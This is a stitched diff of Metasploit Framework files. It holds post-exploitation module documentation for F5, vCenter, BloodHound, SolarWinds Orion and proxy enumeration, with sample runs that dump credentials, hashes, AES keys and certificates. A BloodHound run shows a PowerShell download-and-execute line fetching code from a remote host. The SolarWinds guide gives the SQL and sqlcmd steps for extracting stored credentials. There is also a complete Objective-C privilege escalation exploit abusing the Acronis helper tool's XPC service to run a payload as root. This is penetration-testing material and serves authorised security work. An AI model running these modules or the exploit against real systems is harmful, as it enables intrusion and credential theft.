+[*] Trying to fetch LDAP / Active Directory configuration
+[+] dc.msflab.local:636   - ldaps: 'smcintyre:Password1!'
+[*] Trying to fetch Radius configuration
+[+] 192.168.159.12:1812   - radius: ':radiussecret'
+[+] 192.168.159.13:1812   - radius: ':radiusbackup'
+[*] Trying to fetch TACACS+ configuration
+[+] 192.168.159.200:49    - tacacs+: ':tacaspassword'
+[*] Trying to fetch SMTP configuration
+[+] 192.168.159.128:25    - smtp: 'alice:secretpassword'
+[*] Post module execution completed
+```
+
+The module logs information to the Metasploit database (when connected):
+
+```
+msf6 post(linux/gather/f5_loot_mcp) > creds
+Credentials
+===========
+
+host             origin           service            public            private                                                                                              realm  private_type        JtR Format
+----             ------           -------            ------            -------                                                                                              -----  ------------        ----------
+                 192.168.159.119                     smcintyre         Password1!                                                                                                  Password            
+                 192.168.159.119                     admin             $6$Rvvp3001$4fGV5Pb2gf9rbiV78KCbdbGhfdwsFL0Kt1BR3IIytgb.2aXCpJG0xC2.JDzRvpAjTbIrvBt7YHi (TRUNCATED)         Nonreplayable hash  sha512,crypt
+                 192.168.159.119                     f5hubblelcdadmin  yJXc4uXccfpSrdxcvZIjYT7clhNMUPJG                                                                            Nonreplayable hash  
+                 192.168.159.119                     root              $6$leOcJhIk$pY9xDy1lvacvJzIYM0RCgJ3laTppP2jFjsNek1AbFddYQWEuFMek51K5cyg5BU3pYMhTGQoWgDr (TRUNCATED)         Nonreplayable hash  sha512,crypt
+192.168.159.12   192.168.159.119  1812/tcp (radius)                    radiussecret                                                                                                Password            
+192.168.159.13   192.168.159.119  1812/tcp (radius)                    radiusbackup                                                                                                Password            
+192.168.159.128  192.168.159.119  25/tcp (smtp)      alice             secretpassword                                                                                              Password            
+192.168.159.200  192.168.159.119  49/tcp (tacacs+)                     tacaspassword                                                                                               Password            
+
+msf6 post(linux/gather/f5_loot_mcp) > services
+Services
+========
+
+host             port  proto  name     state  info
+----             ----  -----  ----     -----  ----
+192.168.159.12   1812  tcp    radius   open
+192.168.159.13   1812  tcp    radius   open
+192.168.159.128  25    tcp    smtp     open
+192.168.159.200  49    tcp    tacacs+  open
+
+msf6 post(linux/gather/f5_loot_mcp) >
+```
@@ -274,3 +274,79 @@ msf6 post(linux/gather/vcenter_secrets_dump) > dump
 [+]     AD User: sam@cesium137.io
 [+]     AD Pass: Gr33n3gg$!
 [*] Post module execution completed
+```
+
+Example run from meterpreter session on vCenter appliance version 6.7 build-18831049
+
+```
+msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
+msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
+session => 1
+msf6 post(linux/gather/vcenter_secrets_dump) > run
+[*] VMware VirtualCenter 6.7.0 build-18831049
+[*] vCenter Appliance (Embedded)
+[*] Validating target
+[*] Appliance IPv4: 2.2.2.2
+[*] Appliance Hostname: photon-machine.ragedomain
+[*] Appliance OS: VMware Photon Linux 1.0-62c543d
+[*] Gathering vSphere SSO domain information
+[+] vSphere SSO DC DN: cn=photon-machine.ragedomain,ou=Domain Controllers,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: )sM8M]h,YZBQ:kY['h^(
+[*] Extracting tenant and vpx AES encryption key...
+[+] vSphere Tenant AES encryption
+[+]     KEY: ]E6"Jg7V}d{!Q:Lh
+[+]     HEX: 5d4536224a6737567d647b21513a4c68
+[+] vSphere vmware-vpx AES encryption
+[+]     HEX: ac20416a5850df52f1bf889440995871ba52984a893dbe44fd71c5c768aea3be
+[*] Extracting PostgreSQL database credentials
+[+]     VCDB Name: VCDB
+[+]     VCDB User: vc
+[+]     VCDB Pass: MB&|<)haN6Q>{K3O
+[*] Checking for VPX Users
+[-] No VPXUSER entries were found
+[*] Extract ESXi host vpxuser credentials
+[!] No ESXi hosts attached to this vCenter system
+[*] Extracting vSphere SSO domain secrets
+[*] Dumping vmdir schema to LDIF and storing to loot...
+[!] Unable to retrieve ldif contents
+WARNING:  there is already a transaction in progress
+[-] Error processing LDIF file
+[*] Extracting certificates from vSphere platform
+[+] VMCA_ROOT key: /root/.msf4/loot/20221102165124_default_2.2.2.2_vmca_523828.key
+[+] VMCA_ROOT cert: /root/.msf4/loot/20221102165124_default_2.2.2.2_vmca_694934.pem
+[+] SSO_STS_IDP key: /root/.msf4/loot/20221102165125_default_2.2.2.2_idp_031902.key
+[+] SSO_STS_IDP cert: /root/.msf4/loot/20221102165125_default_2.2.2.2_idp_256763.pem
+[+] MACHINE_SSL_CERT Key: /root/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_448485.key
+[+] MACHINE_SSL_CERT Cert: /root/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_793765.pem
+[+] MACHINE Key: /root/.msf4/loot/20221102165127_default_2.2.2.2_machine_336860.key
+[+] MACHINE Cert: /root/.msf4/loot/20221102165127_default_2.2.2.2_machine_588424.pem
+[+] VSPHERE-WEBCLIENT Key: /root/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_567378.key
+[+] VSPHERE-WEBCLIENT Cert: /root/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_997605.pem
+[+] VPXD Key: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_521342.key
+[+] VPXD Cert: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_415704.pem
+[+] VPXD-EXTENSION Key: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_152066.key
+[+] VPXD-EXTENSION Cert: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_359784.pem
+[+] DATA-ENCIPHERMENT Key: /root/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_517854.key
+[+] DATA-ENCIPHERMENT Cert: /root/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_408460.pem
+[+] SMS Key: /root/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_777691.key
+[+] SMS Cert: /root/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_215695.pem
+[*] Searching for secrets in VM Guest Customization Specification XML
+[!] No vpx_customization_spec entries evident
+[*] Retrieving .pgpass file
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for localhost:replication
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for 127.0.0.1:replication
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for /var/run/vpostgres:replication
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for localhost:postgres
+[+] posgres database creds found: postgres, md5fdb13b980a01e3d1ae99b5b55b6e4303
+[+] posgres database creds found: replicator, md5c2a01981014a380b63c0c7c66ad77ba9
+[+] posgres database creds found: vc, md53b5a9fc0dd6c99567e9ca27c459b43d9
+[+] posgres database creds found: vumuser, md5fc719b1b56f02981027379fd15125feb
+[+] posgres database creds found: cns, md5d92e4534c059354dee12a7cc9a79faff
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for 127.0.0.1:postgres
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for localhost:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for 127.0.0.1:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for /var/run/vpostgres:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for /var/run/vpostgres:postgres
+[+] Saving the /root/.pgpass contents to /root/.msf4/loot/20221102165131_default_2.2.2.2_.pgpass_509065.txt
+[*] Post module execution completed
+```
@@ -29,7 +29,7 @@ Which method to use to get shaphound running.  Default is `download`.

 ### CollectionMethode

-The collection method to use. This parameter accepts a comma separated list of values. Accepted values are `Default`, `Group`,
+The collection method to use. Accepted values are `Default`, `Group`,
 `LocalAdmin`, `RDP`, `DCOM`, `GPOLocalGroup`, `Session`, `ObjectProps`, `ComputerOnly`, `LoggedOn`, `Trusts`, `ACL`, `Container`,
 `DcOnly`, `All`.  The default method is `Default`.

@@ -61,10 +61,6 @@ Uses LDAPs instead of unencrypted LDAP on port 636. The default value is `false`

 Disables Kerberos Signing on requests. The default value is `false`.

-### SkipPing
-
-Skip all ping checks for computers. This option will most likely be slower as API calls will be made to all computers regardless of
-being up Use this option if ping is disabled on the network for some reason. The default value is `false`.

 ### OutputFolder

@@ -80,22 +76,41 @@ If the cache file (.bin) should NOT be written to disk.  Default is `true`.

 ## Scenarios

-```
-meterpreter > run post/windows/gather/bloodhound
+### Windows 2012 Domain Controller, Download method

-[*] Using URL: http://0.0.0.0:8080/bvqUdtHUQ4De1O3
-[*] Local IP: http://192.168.1.136:8080/bvqUdtHUQ4De1O3
-[*] Invoking BloodHound with: Invoke-BloodHound -CollectionMethod Default -Threads 10 -JSONFolder "C:\Windows\TEMP" -PingTimeout 250 -LoopDelay 300 
-[*] Initializing BloodHound at 6:44 AM on 4/29/2019
-[*] Resolved Collection Methods to Group, LocalAdmin, Session, Trusts
-[*] Starting Enumeration for uplift.local
-[*] Status: 58 objects enumerated (+58 �/s --- Using 58 MB RAM )
-[*] Finished enumeration for uplift.local in 00:00:00.6365050
-[*] 0 hosts failed ping. 0 hosts timedout.
-[*] 
-[*] Compressing data to C:\Windows\TEMP\20190429064444_BloodHound.zip.
-[*] You can upload this file directly to the UI.
-[*] Finished compressing files!
+```
+msf6 post(windows/gather/bloodhound) > run
+
+[*] Using URL: http://1.1.1.1:8080/127mPhBr3dZ
+[*] Loading BloodHound with: IEX (new-object net.webclient).downloadstring('http://1.1.1.1:8080/127mPhBr3dZ')
+[*] Invoking BloodHound with: Invoke-BloodHound -OutputDirectory "C:\Users\ADMINI~1\AppData\Local\Temp" -ZipFileName isid -MemCache -ZipPassword ilvtbfgkcmwszdxjn 
+[*] 2022-11-13T13:45:21.0298446-05:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
+[*] 2022-11-13T13:45:21.4198615-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
+[*] 2022-11-13T13:45:21.4666492-05:00|INFORMATION|Initializing SharpHound at 1:45 PM on 11/13/2022
+[*] 2022-11-13T13:45:22.2154647-05:00|INFORMATION|Loaded cache with stats: 59 ID to type mappings.
+[*]  59 name to SID mappings.
+[*]  0 machine sid mappings.
+[*]  2 sid to domain mappings.
+[*]  0 global catalog mappings.
+[*] 2022-11-13T13:45:22.2310827-05:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
+[*] 2022-11-13T13:45:22.6054639-05:00|INFORMATION|Beginning LDAP search for hoodiecola.com
+[*] 2022-11-13T13:45:22.7458626-05:00|INFORMATION|Producer has finished, closing LDAP channel
+[*] 2022-11-13T13:45:22.7614632-05:00|INFORMATION|LDAP channel closed, waiting for consumers
+[*] 2022-11-13T13:45:53.5431310-05:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 87 MB RAM
+[*] 2022-11-13T13:46:06.1354911-05:00|INFORMATION|Consumers finished, closing output channel
+[*] 2022-11-13T13:46:06.2134955-05:00|INFORMATION|Output channel closed, waiting for output task to complete
+[*] Closing writers
+[*] 2022-11-13T13:46:06.5255088-05:00|INFORMATION|Status: 100 objects finished (+100 2.325581)/s -- Using 89 MB RAM
+[*] 2022-11-13T13:46:06.5255088-05:00|INFORMATION|Enumeration finished in 00:00:43.9260652
+[*] 2022-11-13T13:46:06.7283096-05:00|INFORMATION|Saving cache with stats: 59 ID to type mappings.
+[*]  59 name to SID mappings.
+[*]  0 machine sid mappings.
+[*]  2 sid to domain mappings.
+[*]  0 global catalog mappings.
+[*] 2022-11-13T13:46:06.7439000-05:00|INFORMATION|SharpHound Enumeration Completed at 1:46 PM on 11/13/2022! Happy Graphing!
+[+] Downloaded C:\Users\ADMINI~1\AppData\Local\Temp\20221113134605_isid.zip: /root/.msf4/loot/20221113141655_default_2.2.2.2_windows.ad.blood_027677.zip
+[+] Zip password: ilvtbfgkcmwszdxjn
+[*] Post module execution completed
 ```

 ### Windows 10 non-AD host, Windows Server 2012 AD, Disk Method
@@ -6,6 +6,7 @@ This module allows you to collect login information for PureVPN client, specific

 Versions before 6.0 should be vulnerable. For testing purposes, you may find the vulnerable version here:

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 * [https://jumpshare.com/v/LZcpUqJcThY1v7WlH95m](https://jumpshare.com/v/LZcpUqJcThY1v7WlH95m)
 * [https://s3.amazonaws.com/purevpn-dialer-assets/windows/app/purevpn_setup.exe](https://s3.amazonaws.com/purevpn-dialer-assets/windows/app/purevpn_setup.exe)

@@ -0,0 +1,291 @@
+## Vulnerable Application
+
+This module exports and decrypts credentials from SolarWinds Orion Network Performance Monitor
+to a CSV file; it is intended as a post-exploitation module for Windows hosts with SolarWinds
+Orion NPM installed. The module supports decryption of AES-256, RSA, and XMLSEC secrets. Separate
+actions for extraction and decryption of the data are provided to allow session migration during
+execution in order to log in to the SQL database using SSPI. Tested on  the 2020 version of
+SolarWinds Orion NPM. This module is possible only because of the source code and technical
+information published by Rob Fuller:
+
+https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion
+
+and Atredis Partners:
+
+https://github.com/atredispartners/solarwinds-orion-cryptography
+
+Meterpreter must be running in the context of SYSTEM in order to extract encryption keys.
+
+## Actions
+
+### Dump
+
+`dump` is the default action and performs extraction of the Orion database parameters and encryption keys.
+This action also exports Orion SQL data and immediately decrypts it. `dump` is suitable when the following
+conditions are met:
+
+1. The sqlcmd binary is available on the target system
+2. The machine account has access to the Orion database (if Windows Integrated) or Orion is using SQL native auth
+
+Invoking the `dump` action requires SYSTEM level permissions on the target host in order to extract AES keys.
+
+### Export
+
+`export` performs SQL data extraction of the encrypted data as a CSV file; use this option if it is necessary to
+migrate the Meterpreter session to a new non-SYSTEM identity in order to access the SQL database. Invoking the
+`export` action requires the Meterpreter session to be running in the context of a user that has access to the
+configured Orion SQL database.
+
+### Decrypt
+
+`decrypt` performs decryption of encrypted Orion SQL data. To invoke the `decrypt` action, you must also set the
+`CSV_FILE` advanced option or the `MSSQL_INSTANCE` and `MSSQL_DB` options, as well as the `AES_KEY` and
+`RSA_KEY_FILE` advanced options. See `SQL Data Acquisition` below for more information.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get session on host via method of choice and background it
+3. Do: `use post/windows/gather/credentials/solarwinds_orion_dump`
+4. Do: `set session <session>`
+5. Do: `dump` to extract and decrypt the Orion database, or `export` to extract the encrypted database only
+
+If `dump` or `export` fail, the session identity may need permission to log in to SQL; see `Scenarios`.
+
+## Advanced Options
+
+### AES_KEY
+
+The AES-256 key extracted from `default.dat` in hexadecimal format. Provide this option
+when invoking offline decryption using the `decrypt` action.
+
+### CERT_SHA1
+
+The SHA1 thumbprint of the SSL certificate in the Windows machine certificate store that
+is assigned to SolarWinds Orion for decryption of RSA and XMLSEC secrets. Set this option
+if Orion uses a custom certificate or has multiple certificates in the store with a Subject
+Common Name of `CN=solarwinds-orion`.
+
+### CSV_FILE
+
+Path to a CSV file that contains the encrypted Orion database data that has been
+previously exported. Provide this option when invoking offline decryption using the
+`decrypt` action.
+
+### MSSQL_DB
+
+The MSSQL database name used by Orion, specified in the `INITIAL CATALOG` as extracted
+from `SWNetPerfMon.DB`. Provide this option when invoking the `export` action.
+
+### MSSQL_INSTANCE
+
+The path to the MSSQL instance used by Orion, specified in the `DATA SOURCE` as extracted
+from `SWNetPerfMon.DB`. Provide this option when invoking the `export` action.
+
+### RSA_KEY_FILE
+
+Path to the extracted RSA private key associated with the certificate assigned to SolarWinds
+Orion for decryption of RSA and XMLSEC secrets. Provide this option when invoking offline
+decryption using the `decrypt` action, or you wish to provide alternative RSA private key
+material during `dump`.
+
+## Scenarios
+
+### SQL Data Acquisition
+
+The sqlcmd binaries (part of the SQL Server Management Studio) must be installed on the system
+to access the database. Orion does not install SSMS or sqlcmd by default if it is not also
+installing a local SQL server instance - in such cases, it will be necessary to extract the
+encrypted database manually and provide the module with a path to the extracted data. To do so
+execute the SQL query below against the Orion database and save the resulting row set as a CSV file.
+
+The CSV header must match:
+
+`CredentialID,Name,Description,CredentialType,CredentialOwner,CredentialPropertyName,Value,Encrypted`
+
+Columns are cast `VARBINARY` to deal with poor CSV export support in `sqlcmd`. Export the results of
+the query below to CSV file:
+
+```
+SELECT 
+  c.ID AS CredentialID,
+  CONVERT(VARBINARY(1024),c.Name) Name,
+  CONVERT(VARBINARY(1024),c.Description) Description,
+  CONVERT(VARBINARY(256),c.CredentialType) CredentialType,
+  CONVERT(VARBINARY(256),c.CredentialOwner) CredentialOwner,
+  CONVERT(VARBINARY(1024),cp.Name) CredentialPropertyName,
+  CONVERT(VARBINARY(8000),cp.Value) Value,
+  cp.Encrypted 
+FROM
+  [dbo].[Credential] AS c
+JOIN 
+  [dbo].[CredentialProperty] AS cp ON (c.ID=cp.CredentialID)
+```
+
+Output must be encoded VARBINARY per above, and must be well-formed CSV (i.e. no trailing whitespace).
+If using `sqlcmd`, ensure the `-W` and `-I` parameters are included to strip trailing whitespace and
+allow quoted identifyers. Suggested syntax for `sqlcmd` using Windows authentication is below, where
+the contents of `solarwinds_sql_query.sql` is the text of the SQL query above:
+
+`sqlcmd -d "<DBNAME>" -S <MSSQL_INSTANCE> -E -i solarwinds_sql_query.sql -o solarwinds_dump.csv -h-1 -s"," -w 65535 -W -I`
+
+This should place a CSV export file suitable for use within the module at `solarwinds_dump.csv`. If
+using SQL native auth, replace the `-E` parameter with
+
+`-U "<MSSQL_USER>" -P "<MSSQL_PASS>"`
+
+### Examples
+
+Windows Server 2019 host running Orion NPM 2020 using the `dump` action:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/solarwinds_orion_dump
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > dump
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.2.65120.0
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[*] Decrypt SolarWinds CryptoHelper Keystorage ...
+[+] Compressed size: 2104
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[+] Compressed size: 1344
+[+] Compressed size: 1736
+[+] Extracted SolarWinds Orion RSA private key for LocalMachine certificate with SHA1 thumbprint C3D5248B978C8D161DA0267C1DE946B1FDE4E7D2
+[+] SolarWinds Orion RSA Key: /root/.msf4/loot/20221118093908_default_192.168.101.125_orionssl_000289.key
+[*] Decrypt SWNetPerfMon.DB ...
+[+] Compressed size: 2064
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: orion
+[+]     Database Pass: 3qmEixYNZsElaE0JR0vt9c1NwO
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[+] 10 rows exported, 6 unique CredentialIDs
+[+] Encrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118093912_default_192.168.101.125_solarwinds_orion_822163.txt
+[*] Performing decryption of SolarWinds Orion SQL database
+[+] 10 rows loaded, 6 unique CredentialIDs
+[*] Process SolarWinds Orion DB ...
+[+] 10 rows processed
+[*] 10 rows recovered: 6 plaintext, 4 decrypted (0 blank)
+[*] 10 rows written (0 blank rows withheld)
+[+] 6 unique CredentialID records recovered
+[+] Decrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118093912_default_192.168.101.125_solarwinds_orion_067745.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) >
+```
+
+Host with MSSQL SSPI authentication configured for external database - use `dump` to
+extract keys, then migrate the session PID to an identity with permission to log on to
+the SQL server. Perform `export` to acquire the encrypted data, then perform `decrypt`
+to produce the plaintext:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/solarwinds_orion_dump
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > dump
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.2.65120.0
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[*] Decrypt SolarWinds CryptoHelper Keystorage ...
+[+] Compressed size: 2108
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[+] Compressed size: 1344
+[+] Compressed size: 1748
+[+] Extracted SolarWinds Orion RSA private key for LocalMachine certificate with SHA1 thumbprint C3D5248B978C8D161DA0267C1DE946B1FDE4E7D2
+[+] SolarWinds Orion RSA Key: /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+[*] Decrypt SWNetPerfMon.DB ...
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[-] Sqlcmd: Error: Microsoft ODBC Driver 13 for SQL Server : Login failed for user 'CESIUM137\WINNING$'..
+[-] No records exported from SQL server
+[-] Post aborted due to failure: unknown: Could not export SolarWinds Orion database records
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set AES_KEY 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+AES_KEY => 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set RSA_KEY_FILE /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+RSA_KEY_FILE => /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set MSSQL_INSTANCE tcp:cornflakes.cesium137.io
+MSSQL_INSTANCE => tcp:cornflakes.cesium137.io
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set MSSQL_DB SolarWindsOrion
+MSSQL_DB => SolarWindsOrion
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > ps
+
+Process List
+============
+
+ PID    PPID   Name                                     Arch  Session  User                                Path
+ ---    ----   ----                                     ----  -------  ----                                ----
+ 0      0      [System Process]
+ 4      0      System                                   x64   0
+ [...]
+ 10704  10636  explorer.exe                             x64   1        CESIUM137\operatorman               C:\Windows\explorer.exe
+ [...]
+
+meterpreter > migrate 10704
+[*] Migrating from 17108 to 10704...
+[*] Migration completed successfully.
+meterpreter > bg
+[*] Backgrounding session 1...
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > export
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.2.65120.0
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[*] MSSQL_INSTANCE and MSSQL_DB advanced options set, connect to SQL using SSPI
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[+] 10 rows exported, 6 unique CredentialIDs
+[+] Encrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set CSV_FILE /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+CSV_FILE => /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > decrypt 
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.2.65120.0
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[*] Performing decryption of SolarWinds Orion SQL database
+[+] 10 rows loaded, 6 unique CredentialIDs
+[*] Process SolarWinds Orion DB ...
+[+] 10 rows processed
+[*] 10 rows recovered: 6 plaintext, 4 decrypted (0 blank)
+[*] 10 rows written (0 blank rows withheld)
+[+] 6 unique CredentialID records recovered
+[+] Decrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118091959_default_192.168.101.125_solarwinds_orion_687493.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) >
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This module pulls a user's proxy settings. If neither RHOST or SID
+are set it pulls the current user, else it will pull the user's settings
+for the specified SID and target host.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session on a Windows host
+1. Do: `use post/windows/gather/enum_proxy`
+1. Do: `set session <session id>`
+1. Do: `run`
+1. You should receive system proxy information
+
+
+## Options
+
+### RHOST
+
+Remote host to clone settings to (defaults to local)
+
+### SID
+
+SID of user to clone settings to (SYSTEM is S-1-5-18) (default: blank)
+
+
+## Scenarios
+
+### Windows Server 2016 (x86_64)
+
+```
+msf6 > use post/windows/gather/enum_proxy
+msf6 post(windows/gather/enum_proxy) > set session 1
+session => 1
+msf6 post(windows/gather/enum_proxy) > run
+
+[*] Proxy Counter = 3
+[*] Setting: WPAD and Proxy server
+[*] Proxy Server: http=127.0.0.1:80;https=127.0.0.1:80;ftp=127.0.0.1:80
+[*] Post module execution completed
+```
+
+### Windows 7 SP1 (x86_64)
+
+```
+msf6 > use post/windows/gather/enum_proxy
+msf6 post(windows/gather/enum_proxy) > set session 1
+session => 1
+msf6 post(windows/gather/enum_proxy) > run
+
+[*] Proxy Counter = 77
+[*] Setting: WPAD, Proxy server and AutoConfigure script
+[*] Proxy Server: http=127.0.0.1:8080;https=127.0.0.1:8080;ftp=127.0.0.1:8080
+[*] AutoConfigURL: http://corp.local/wpad.dat
+[*] Post module execution completed
+msf6 post(windows/gather/enum_proxy) > 
+```
@@ -0,0 +1,48 @@
+// Compiled with: gcc -framework Foundation acronis-exp.m -o acronis-exp.macho
+
+#import <Foundation/Foundation.h>
+
+@protocol HelperToolProtocol
+- (void)checkFullDiskAccessWithReply:(void (^)(BOOL))arg1;
+- (void)executeProcess:(NSString *)arg1 arguments:(NSArray *)arg2 caller:(int)arg3 withReply:(void (^)(int))arg4;
+- (void)getProcessIdentifierWithReply:(void (^)(int))arg1;
+@end
+
+
+int main(int argc, char *argv[])
+{
+    NSString *service_name;
+    NSString *payload = @"/tmp/payload";
+    NSArray *arg_array = @[@"-c", payload];
+    NSFileManager *file_manager = [NSFileManager defaultManager];
+
+    NSString *service_name_2020 = @"com.acronis.trueimagehelper";
+    NSString *service_name_2021 = @"com.acronis.helpertool";
+    NSString *helper_path_2020 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2020];
+    NSString *helper_path_2021 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2021];
+
+    if ([file_manager fileExistsAtPath:helper_path_2020])
+    {
+        service_name = service_name_2020;
+    }
+    else
+    {
+        service_name = service_name_2021;
+    }
+
+    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
+    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
+    [connection setRemoteObjectInterface:interface];
+
+    [connection resume];
+
+    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error)
+    {
+        return;
+    }];
+
+    [obj executeProcess:@"/bin/zsh" arguments:arg_array caller:0xdeadbeef withReply:^(int arg)
+    {
+        return;
+    }];
+}
@@ -116,6 +116,7 @@ _msfvenom_formats_list=(
  'aspx-exe'
  'axis2'
  'dll'
+  'ducky-script-psh'
  'elf'
  'elf-so'
  'exe'
@@ -13,7 +13,7 @@ class ManagedRemoteDataService
  include Singleton

  #
-  # Returns true if the the managed data service process is running.
+  # Returns true if the managed data service process is running.
  #
  def running?
    return @running
@@ -0,0 +1,125 @@
+require 'metasploit/framework/login_scanner/http'
+require 'json'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      class SyncoveryFileSyncBackup < HTTP
+
+        DEFAULT_PORT = 8999 # HTTP=8999; HTTPS=8943
+        PRIVATE_TYPES = [ :password ].freeze
+        LOGIN_STATUS = Metasploit::Model::Login::Status # Shorter name
+
+        # Checks if the target is Syncovery File Sync & Backup Software. The login module should call this.
+        #
+        # @return [Boolean] TrueClass if target is Syncovery, otherwise FalseClass
+        def check_setup
